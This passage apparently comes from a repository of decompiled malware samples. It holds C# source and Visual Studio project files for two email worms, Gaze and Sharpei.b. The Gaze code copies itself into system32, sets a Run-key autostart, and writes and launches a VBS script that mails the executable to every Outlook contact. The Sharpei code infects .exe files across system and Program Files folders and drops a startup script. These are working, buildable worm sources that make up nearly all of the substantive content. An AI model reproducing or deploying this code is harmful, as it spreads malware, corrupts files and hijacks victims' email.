private RegistryKey key = Registry.LocalMachine;
private RegistryKey key1;
public Form1()
{
this.InitializeComponent();
try
{
if (!File.Exists("c:\\WINNT\\system32\\game.exe"))
{
File.Copy(Directory.GetCurrentDirectory() + "\\game.exe", "c:\\WINNT\\system32\\game.exe", true);
this.key1 = this.key.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
this.key1.SetValue("msdosie", (object) "c:\\WINNT\\system32\\game.exe");
this.key1.Close();
}
FileStream fileStream = new FileStream("c:\\WINNT\\system32\\mail.vbs", FileMode.Create, FileAccess.Write, FileShare.Write);
StreamWriter streamWriter = new StreamWriter((Stream) fileStream);
streamWriter.WriteLine("'On Error Resume Next");
streamWriter.WriteLine("Set objOA=Wscript.CreateObject(\"Outlook.Application\")");
streamWriter.WriteLine("Set objMapi=objOA.GetNameSpace(\"MAPI\")");
streamWriter.WriteLine("For i=1 to objMapi.AddressLists.Count");
streamWriter.WriteLine("Set objAddList=objMapi.AddressLists(i)");
streamWriter.WriteLine("For j=1 To objAddList. AddressEntries.Count");
streamWriter.WriteLine("Set objMail=objOA.CreateItem(0)");
streamWriter.WriteLine("objMail.Recipients.Add objAddList.AddressEntries(j)");
streamWriter.WriteLine("objMail.Subject=\"faze\"");
streamWriter.WriteLine("objMail.Body=\"How are you today?\"");
streamWriter.WriteLine("objMail.Attachments.Add \"c:\\WINNT\\system32\\game.exe\"");
streamWriter.WriteLine("objMail.Send");
streamWriter.WriteLine("Next");
streamWriter.WriteLine("Next");
streamWriter.WriteLine("Set objMapi=Nothing");
streamWriter.WriteLine("Set objOA=Nothing");
streamWriter.Flush();
streamWriter.Close();
fileStream.Close();
Process.Start("c:\\WINNT\\system32\\mail.vbs");
}
catch
{
}
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.AutoScaleBaseSize = new Size(6, 14);
this.ClientSize = new Size(292, 273);
this.Name = nameof (Form1);
this.ShowInTaskbar = false;
this.Text = nameof (Form1);
this.WindowState = FormWindowState.Minimized;
}
[STAThread]
private static void Main() => Application.Run((Form) new Form1());
}
}
MSIL/Email-Worm/Win32/G/Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0/Form1.resx
+123
View File
@@ -0,0 +1,123 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<data name="$this.Name" mimetype="application/x-microsoft.net.object.binary.base64">
<value>BUZvcm0x</value>
</data>
</root>
MSIL/Email-Worm/Win32/S/Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System.Reflection;
[assembly: AssemblyCopyright("")]
[assembly: AssemblyKeyFile("")]
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyVersion("1.0.786.1197")]
MSIL/Email-Worm/Win32/S/Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84/Email-Worm.Win32.Sharpei.b.csproj
+43
View File
@@ -0,0 +1,43 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{3AB86921-A569-4B25-8BDA-B5539F274189}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Sharp</AssemblyName>
<ApplicationVersion>1.0.786.1197</ApplicationVersion>
<RootNamespace>Sharp</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="Sharp.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Sharp.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Email-Worm/Win32/S/Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84/Email-Worm.Win32.Sharpei.b.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Sharp", "Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84.csproj", "{3AB86921-A569-4B25-8BDA-B5539F274189}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3AB86921-A569-4B25-8BDA-B5539F274189}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{3AB86921-A569-4B25-8BDA-B5539F274189}.Debug|Any CPU.Build.0 = Debug|Any CPU
{3AB86921-A569-4B25-8BDA-B5539F274189}.Release|Any CPU.ActiveCfg = Release|Any CPU
{3AB86921-A569-4B25-8BDA-B5539F274189}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Email-Worm/Win32/S/Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84/Sharp.cs
+86
View File
@@ -0,0 +1,86 @@
// Decompiled with JetBrains decompiler
// Type: Sharp.Sharp
// Assembly: Sharp, Version=1.0.786.1197, Culture=neutral, PublicKeyToken=null
// MVID: C5414447-1586-4206-9133-31D57E99CDF8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
namespace Sharp
{
public class Sharp
{
private static string virname = (string) Registry.LocalMachine.OpenSubKey("Software\\Sharp").GetValue("");
[STAThread]
private static void Main()
{
StreamWriter text = new FileInfo(new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.Startup)).FullName + "\\Sharp.vbs").CreateText();
text.Write("MsgBox \"You're infected with Win32.HLLP.Sharp, written in C#, by Gigabyte/Metaphase\",64,\"title\"");
text.Close();
string fullName = new DirectoryInfo(Environment.SystemDirectory).Parent.FullName;
string[] directories = Directory.GetDirectories(new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles)).FullName, "*.*");
Sharp.Sharp.FileSearch(fullName);
Sharp.Sharp.FileSearch(directories[11]);
Sharp.Sharp.FileSearch(directories[12]);
Sharp.Sharp.FileSearch(directories[13]);
FileStream fileStream1 = new FileStream(Sharp.Sharp.virname, FileMode.Open, FileAccess.Read);
FileStream fileStream2 = new FileStream("temp.exe", FileMode.OpenOrCreate);
byte[] buffer = new byte[(int) checked ((uint) unchecked ((int) fileStream1.Length - 12288))];
fileStream1.Seek(12288L, SeekOrigin.Begin);
fileStream1.Read(buffer, 0, (int) fileStream1.Length - 12288);
fileStream2.Write(buffer, 0, (int) fileStream1.Length - 12288);
long length = fileStream2.Length;
fileStream2.Close();
if (length > 0L && !Sharp.Sharp.virname.EndsWith("MS02-010.exe"))
new Process() { StartInfo = { FileName = "temp.exe" } }.Start();
while (File.Exists("temp.exe"))
{
try
{
File.Delete("temp.exe");
}
catch
{
}
}
}
private static void FileSearch(string DirectoryToCheck)
{
string[] files = Directory.GetFiles(DirectoryToCheck, "*.exe");
int length = files.Length;
for (int index = 0; index < length; ++index)
{
string str = files[index];
FileStream fileStream1 = new FileStream(str, FileMode.Open, FileAccess.Read);
fileStream1.Seek(18L, SeekOrigin.Begin);
int num = fileStream1.ReadByte();
fileStream1.Close();
if (num != 103)
{
try
{
File.SetAttributes(str, FileAttributes.Normal);
File.Copy(str, "hostcopy.exe", true);
File.Copy(Sharp.Sharp.virname, str, true);
FileStream fileStream2 = new FileStream("hostcopy.exe", FileMode.Open);
FileStream fileStream3 = new FileStream(str, FileMode.Append);
byte[] buffer = new byte[(int) checked ((uint) unchecked ((int) fileStream2.Length))];
fileStream2.Read(buffer, 0, (int) fileStream2.Length);
fileStream3.Write(buffer, 0, (int) fileStream2.Length);
fileStream2.Close();
fileStream3.Close();
}
catch
{
}
}
}
File.Delete("hostcopy.exe");
}
}
}
MSIL/Email-Worm/Win32/S/Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84/Sharp.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>